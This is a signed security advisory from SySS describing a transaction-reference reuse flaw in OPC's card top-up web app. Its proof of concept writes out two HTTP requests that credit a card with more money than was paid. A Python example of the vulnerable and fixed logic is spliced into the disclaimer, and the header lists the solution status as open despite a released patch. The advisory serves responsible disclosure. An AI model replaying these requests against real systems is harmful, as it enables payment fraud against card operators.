-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2024-089
Product: OPC® WebApp Aufwertung
Manufacturer: OPC
Affected Version(s): 2.1.0
Tested Version(s): 2.1.0
Vulnerability Type: Business Logic
Risk Level: Critical
Solution Status: Open
Manufacturer Notification: 2024-11-15
Solution Date: 2024-12-19
Public Disclosure: 2025-03-24
CVE Reference: CVE-2025-30073
Author of Advisory: Stefan Krause, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

OPC® WebApp Aufwertung is a web application used to transfer money to
employee cards. These cards are then used to pay, e.g., in companies,
schools, hospitals, and restaurants.

The manufacturer describes the product, which is an integral part of the
OPC® CateringApp web app, as follows (see [1]):

"Die OPC® CateringApp-WebApp eröffnet zahlreiche neue Möglichkeiten,
darunter Online-Aufladungen (eCommerce), Online-Zahlungen [...]"

[Translation: "The OPC® CateringApp web app opens up numerous new
possibilities, including online recharges (eCommerce), online payments
[...]"]

Because transaction references can be reused, the application is
vulnerable to business logic attacks.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The reference assigned to a transaction can be reused for further
transactions. When a payment is completed, either the first transaction
or all transactions carrying the same reference are marked as completed,
depending on the timing. This can be used to transfer more money to an
employee card than has actually been paid for.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

First, send a transaction request with a high amount:

POST /api HTTP/1.1
Host:
Cookie: [...]
[...]
-----------------------------96459980630320972411742839320
Content-Disposition: form-data; name="cardtype"

M
-----------------------------96459980630320972411742839320
Content-Disposition: form-data; name="ref"

ae6735accad0c4c1549
-----------------------------96459980630320972411742839320
Content-Disposition: form-data; name="topupAmount"

100
-----------------------------96459980630320972411742839320
Content-Disposition: form-data; name="lastname"

redacted
-----------------------------96459980630320972411742839320
Content-Disposition: form-data; name="country"

DE
-----------------------------96459980630320972411742839320
Content-Disposition: form-data; name="service"

ecommerce
-----------------------------96459980630320972411742839320
Content-Disposition: form-data; name="action"

start-payment
-----------------------------96459980630320972411742839320--

Do not complete the payment; leave it open instead.

Then send another transaction request with the same reference, but with
a lower amount, like this:

POST /api HTTP/1.1
Host:
Cookie: [...]
[...]

-----------------------------96459980630320972411742839320
Content-Disposition: form-data; name="cardtype"

M
-----------------------------96459980630320972411742839320
Content-Disposition: form-data; name="ref"

ae6735accad0c4c1549
-----------------------------96459980630320972411742839320
Content-Disposition: form-data; name="topupAmount"

1
-----------------------------96459980630320972411742839320
Content-Disposition: form-data; name="lastname"

redacted
-----------------------------96459980630320972411742839320
Content-Disposition: form-data; name="country"

DE
-----------------------------96459980630320972411742839320
Content-Disposition: form-data; name="service"

ecommerce
-----------------------------96459980630320972411742839320
Content-Disposition: form-data; name="action"

start-payment
-----------------------------96459980630320972411742839320--

Complete the payment for the second request.
The first transaction (with the high amount) gets confirmed as well. As a
result, more money is transferred to the employee card than was paid.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Update the software to version 2.1.3 or later.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-11-14: Vulnerability discovered
2024-11-15: Vulnerability reported to manufacturer
2024-12-19: Patch released by manufacturer
2025-03-24: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for OPC® WebApp Aufwertung
    https://www.opc.de/loesungen/kassensystem-kantine-betriebsrestaurant-gemeinschaft/
[2] SySS Security Advisory SYSS-2024-089
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-089.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Stefan Krause of SySS GmbH.

E-Mail: stefan.krause@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Stefan_Krause.asc
Key ID: 0x2B2BA6FDD6E172F3
PGP-Fingerprint: 88C8 13B9 FA6A 2FE6 B6D8 7226 2B2B A6FD D6E1 72F3

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS
website.
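To make the reference-reuse flaw from the Vulnerability Details and PoC above concrete, here is an added example (not OPC's code) of a minimal top-up service: with strict=False it models the described behaviour, where completing one payment confirms every open transaction sharing the reference; with strict=True it enforces the two checks a fixed handler needs, a unique reference per transaction and a collected amount that matches the requested top-up. The Transaction, TopUpService, start_payment and complete_payment names and the in-memory store are assumptions of this example.

```python
"""Added example modelling advisory SYSS-2024-089 (not the vendor's code)."""
from dataclasses import dataclass, field


@dataclass
class Transaction:
    ref: str
    amount: int            # top-up amount in whole currency units (constructed)
    status: str = "open"   # open -> confirmed | failed


@dataclass
class TopUpService:
    # Hypothetical in-memory store standing in for the app's database.
    transactions: list = field(default_factory=list)
    card_balance: int = 0
    strict: bool = True    # False reproduces the behaviour the advisory describes

    def start_payment(self, ref: str, amount: int) -> Transaction:
        # Hardened: a reference identifies at most one transaction, so a second
        # start-payment carrying an already used ref is refused outright.
        if self.strict and any(t.ref == ref for t in self.transactions):
            raise ValueError(f"reference {ref!r} already in use")
        tx = Transaction(ref, amount)
        self.transactions.append(tx)
        return tx

    def complete_payment(self, ref: str, paid: int) -> int:
        """Payment-provider callback: credit the card, return the amount credited."""
        matches = [t for t in self.transactions
                   if t.ref == ref and t.status == "open"]
        if self.strict:
            # Hardened: exactly one open transaction per ref, and the amount the
            # provider actually collected must equal the requested top-up.
            if len(matches) != 1:
                raise ValueError(f"{len(matches)} open transactions for {ref!r}")
            if matches[0].amount != paid:
                matches[0].status = "failed"
                raise ValueError(f"paid {paid}, transaction requests {matches[0].amount}")
        credited = 0
        for tx in matches:  # vulnerable mode: every open tx with this ref is confirmed
            tx.status = "confirmed"
            self.card_balance += tx.amount
            credited += tx.amount
        return credited
```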
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 4.0
URL: https://creativecommons.org/licenses/by/4.0/deed.en